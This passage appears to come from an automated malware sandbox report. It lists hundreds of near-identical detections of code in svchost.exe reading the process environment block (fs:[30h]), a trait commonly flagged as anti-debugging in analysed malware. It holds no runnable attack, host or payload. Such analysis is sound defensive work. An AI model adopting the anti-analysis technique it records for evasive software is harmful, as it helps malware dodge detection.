                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov ecx, dword ptr fs:[00000030h]3_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F0115 mov eax, dword ptr fs:[00000030h]3_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060124 mov eax, dword ptr fs:[00000030h]3_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov ecx, dword ptr fs:[00000030h]3_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C156 mov eax, dword ptr fs:[00000030h]3_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C8158 mov eax, dword ptr fs:[00000030h]3_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]3_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]3_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]3_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]3_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03070185 mov eax, dword ptr fs:[00000030h]3_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]3_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]3_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]3_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]3_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]3_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]3_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031061E5 mov eax, dword ptr fs:[00000030h]3_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030601F8 mov eax, dword ptr fs:[00000030h]3_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4000 mov ecx, dword ptr fs:[00000030h]3_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A020 mov eax, dword ptr fs:[00000030h]3_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C020 mov eax, dword ptr fs:[00000030h]3_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6030 mov eax, dword ptr fs:[00000030h]3_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032050 mov eax, dword ptr fs:[00000030h]3_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6050 mov eax, dword ptr fs:[00000030h]3_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305C073 mov eax, dword ptr fs:[00000030h]3_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303208A mov eax, dword ptr fs:[00000030h]3_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030280A0 mov eax, dword ptr fs:[00000030h]3_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C80A8 mov eax, dword ptr fs:[00000030h]3_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F60B8 mov eax, dword ptr fs:[00000030h]3_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F60B8 mov ecx, dword ptr fs:[00000030h]3_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B20DE mov eax, dword ptr fs:[00000030h]3_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030380E9 mov eax, dword ptr fs:[00000030h]3_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B60E0 mov eax, dword ptr fs:[00000030h]3_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C0F0 mov eax, dword ptr fs:[00000030h]3_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030720F0 mov ecx, dword ptr fs:[00000030h]3_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C700 mov eax, dword ptr fs:[00000030h]3_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030710 mov eax, dword ptr fs:[00000030h]3_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060710 mov eax, dword ptr fs:[00000030h]3_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]3_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]3_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]3_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov ecx, dword ptr fs:[00000030h]3_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]3_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AC730 mov eax, dword ptr fs:[00000030h]3_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov esi, dword ptr fs:[00000030h]3_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]3_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]3_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030750 mov eax, dword ptr fs:[00000030h]3_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE75D mov eax, dword ptr fs:[00000030h]3_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]3_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]3_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4755 mov eax, dword ptr fs:[00000030h]3_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038770 mov eax, dword ptr fs:[00000030h]3_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D678E mov eax, dword ptr fs:[00000030h]3_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030307AF mov eax, dword ptr fs:[00000030h]3_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E47A0 mov eax, dword ptr fs:[00000030h]3_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303C7C0 mov eax, dword ptr fs:[00000030h]3_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B07C3 mov eax, dword ptr fs:[00000030h]3_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE7E1 mov eax, dword ptr fs:[00000030h]3_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]3_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]3_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE609 mov eax, dword ptr fs:[00000030h]3_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072619 mov eax, dword ptr fs:[00000030h]3_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E627 mov eax, dword ptr fs:[00000030h]3_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03066620 mov eax, dword ptr fs:[00000030h]3_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068620 mov eax, dword ptr fs:[00000030h]3_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303262C mov eax, dword ptr fs:[00000030h]3_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304C640 mov eax, dword ptr fs:[00000030h]3_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]3_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]3_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]3_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]3_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062674 mov eax, dword ptr fs:[00000030h]3_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]3_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]3_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C6A6 mov eax, dword ptr fs:[00000030h]3_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030666B0 mov eax, dword ptr fs:[00000030h]3_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A6C7 mov eax, dword ptr fs:[00000030h]3_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]3_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]3_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6500 mov eax, dword ptr fs:[00000030h]3_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]3_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]3_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032582 mov eax, dword ptr fs:[00000030h]3_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032582 mov ecx, dword ptr fs:[00000030h]3_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064588 mov eax, dword ptr fs:[00000030h]3_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E59C mov eax, dword ptr fs:[00000030h]3_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]3_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]3_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]3_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]3_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030365D0 mov eax, dword ptr fs:[00000030h]3_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]3_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]3_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030325E0 mov eax, dword ptr fs:[00000030h]3_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]3_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]3_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C427 mov eax, dword ptr fs:[00000030h]3_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A430 mov eax, dword ptr fs:[00000030h]3_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA456 mov eax, dword ptr fs:[00000030h]3_2_030EA456
